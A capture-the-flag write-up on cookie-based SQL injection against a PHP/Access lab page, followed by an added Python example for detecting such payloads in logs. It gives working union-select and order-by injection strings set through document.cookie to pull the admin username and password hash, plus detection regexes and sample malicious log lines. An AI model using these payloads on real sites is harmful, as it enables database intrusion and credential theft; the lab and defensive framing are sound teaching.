Access injection: cookie injection
Lab address:
Principle: in PHP, $_REQUEST[] returns parameters from POST, GET and COOKIE alike, so you can capture the request in Burp and modify the cookie parameters, or set the cookie from the browser console with JS to perform the injection.
First challenge:
We enter the lab and click a link to reach a page that takes an id parameter.
First we try error-based injection by passing the parameter via GET. That is blocked, so we try cookie injection. Open Burp to capture the request and remove id=171 from the URL. Append a semicolon to the Cookie header, then add id=171 after it, and forward the request to see whether the statement is executed. Although there is no longer an id parameter in the URL, the page renders normally, which means the id value I put in the cookie was used by the query. So I use JS in the browser console to determine the number of columns:
document.cookie="id="+escape("171 order by 1")
The page loads normally, so we keep increasing the number, up to 11:
document.cookie="id="+escape("171 order by 11")
That produces an error, so we try 10:
document.cookie="id="+escape("171 order by 10")
The page loads normally, so the query has 10 columns. Continue with the next JS statement:
document.cookie="id="+escape("171 union select 1,2,3,4,5,6,7,8,9,10 from admin")
Because an Access database has only a single database name, you must append from admin for the union query to run; the page then displays columns 2, 3, 7, 8 and 9, and those are where the data will appear. To determine the table name we could guess by hand, but brute-forcing with Burp is easier for beginners, so we captured the request and ran a wordlist. It turned up many possible table names, but in the era when Access databases were popular the credentials were almost always in the username and password columns of the admin table, so we entered directly:
document.cookie="id="+escape("171 union select 1,username,3,4,5,6,7,8,9,10 from admin")
This reveals the account admin; continue with:
document.cookie="id="+escape("171 union select 1,password,3,4,5,6,7,8,9,10 from admin")
This reveals the password hash:
b9a2a2b5dffb918c
Logging in to the admin back end with this value fails, so it is an MD5 hash.
Cracking the MD5 hash gives the real password, and logging in with it yields the flag: zkz{welcome-control}
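Two points from the write-up are worth seeing in code from the defender's side: why a cookie can silently replace the id parameter (the $_REQUEST principle stated at the top), and how the order by / union select sequence used above looks in server logs. The block below is an added example, not code from the original write-up or the lab; build_request() is a small simulation of PHP's documented request_order / variables_order behaviour (later sources overwrite earlier ones, and php.ini-production sets request_order = "GP" so cookies are excluded), and the log format, cookie names and SAMPLE_LOG lines are constructed for this example.

```python
"""Added example (not from the original write-up): why a cookie can replace the
id parameter, and how to spot such payloads in logs.

Assumptions: the log format, cookie names and the SAMPLE_LOG lines are constructed
for this example; build_request() is a simulation of PHP's documented
request_order / variables_order behaviour, not PHP itself.
"""
import re
from urllib.parse import unquote


def build_request(get, post, cookie, request_order="EGPCS"):
    """Simulate how PHP fills $_REQUEST.

    Sources are registered left to right following request_order (or
    variables_order when request_order is unset); a later source overwrites an
    earlier one. With "EGPCS" a Cookie value for 'id' replaces the GET value,
    which is what the write-up exploits. php.ini-production sets
    request_order = "GP", so cookies never reach $_REQUEST there.
    """
    sources = {"G": get, "P": post, "C": cookie}
    merged = {}
    for letter in request_order.upper():
        merged.update(sources.get(letter, {}))  # E and S are not request inputs
    return merged


def parse_cookie_header(raw):
    """Split a Cookie header into a dict, URL-decoding values (JS escape() output)."""
    cookies = {}
    for part in raw.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name.strip()] = unquote(value)
    return cookies


# Signatures for the two techniques used in the write-up, plus a type check:
# the application expects a numeric id, so anything else in that cookie is suspect.
SQLI_PATTERNS = (
    ("order-by-enumeration", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
)
NUMERIC_COOKIES = {"id"}  # assumption: cookies that must hold integers only


def classify_cookie(name, value):
    """Return the list of signature labels that a decoded cookie value triggers."""
    findings = [label for label, rx in SQLI_PATTERNS if rx.search(value)]
    if name in NUMERIC_COOKIES and not value.isdigit():
        findings.append("non-numeric-id")
    return findings


# Constructed log lines: "<method> <path> Cookie: <header>" (the format is an assumption).
SAMPLE_LOG = """\
GET /show.php?id=171 Cookie: PHPSESSID=abc123
GET /show.php Cookie: PHPSESSID=abc123; id=171%20order%20by%201
GET /show.php Cookie: PHPSESSID=abc123; id=171%20order%20by%2011
GET /show.php Cookie: PHPSESSID=abc123; id=171%20union%20select%201%2Cusername%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%20from%20admin
GET /show.php Cookie: PHPSESSID=abc123; theme=dark
"""


def scan_log(text):
    """Return one record per log line whose cookies match an injection signature."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        if " Cookie: " not in line:
            continue
        header = line.split(" Cookie: ", 1)[1]
        for name, value in parse_cookie_header(header).items():
            findings = classify_cookie(name, value)
            if findings:
                hits.append({"line": line_no, "cookie": name,
                             "value": value, "findings": findings})
    return hits


if __name__ == "__main__":
    req = build_request({"id": "171"}, {}, {"id": "171 order by 1"})
    print("EGPCS ->", req["id"])   # cookie value wins
    req = build_request({"id": "171"}, {}, {"id": "171 order by 1"}, "GP")
    print("GP    ->", req["id"])   # cookie ignored
    for hit in scan_log(SAMPLE_LOG):
        print(hit["line"], hit["cookie"], hit["findings"], repr(hit["value"]))
```

The fix on the application side follows from build_request(): read the parameter from $_GET (or $_POST) rather than $_REQUEST, cast it to an integer or bind it as a prepared-statement parameter, and set request_order = "GP" so the cookie channel is closed application-wide. The scan_log() signatures are deliberately narrow; in a real deployment the non-numeric-id check is the more durable one, because it flags any cookie that deviates from its expected type regardless of the SQL keywords used.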